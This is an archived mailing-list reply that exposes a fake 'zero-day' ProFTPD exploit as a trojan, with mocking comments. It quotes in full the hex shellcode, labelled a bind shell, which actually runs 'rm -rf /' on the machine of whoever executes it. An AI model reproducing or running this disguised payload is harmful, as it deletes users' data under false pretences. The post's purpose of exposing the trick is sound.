| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3F99440C.4060800@insecure.ws>
From: kang at insecure.ws (kang)
Subject: ProFTPD-1.2.9rc2 localhost delete
Jean-Kevin Grosnakeur wrote:
For the non-french people, it means:
Jean-Kevin (mitnick?) the big hacker (kiddy talking)
> Ladies and gentlemen, here's the source code of the exploit for the
> latest
> release of ProFTPD. This is a Zero-Day private exploit, please DON'T
> REDISTRIBUTE. I will not take responsibility for any damages which could
> result from the usage of this exploit, use it at your own risk.
lol?;)
/* x86 bind shellcode */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
LOVE %
funny ;)
hAAAAhAAAAhAAAAhAAAAh
hahaha ;)
> --
> /* connect to the bindshell */
> printf("Trying to connect, please wait...\n");
> void(*sleep)()=(void*)sc;sleep(5);
>
Yes sure;)
Powered by blists - more mailing lists